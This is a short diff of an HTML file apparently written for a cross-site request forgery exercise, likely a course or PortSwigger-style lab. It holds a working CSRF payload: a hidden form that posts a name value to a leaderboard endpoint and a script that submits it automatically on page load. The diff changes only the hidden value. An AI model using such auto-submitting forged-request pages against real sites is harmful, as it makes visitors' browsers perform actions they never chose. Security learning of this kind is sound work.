--- a/CSRF_portswigger.html
+++ b/CSRF_portswigger.html
@@ -1,7 +1,7 @@
 <html>
     <body>
         <form action="https://message.uqcloud.net/leaderboard.php" method="POST">
-            <input type="hidden" name="name" value="s4696637" />
+            <input type="hidden" name="name" value="value" />
         </form>
         <script>
             document.forms[0].submit();
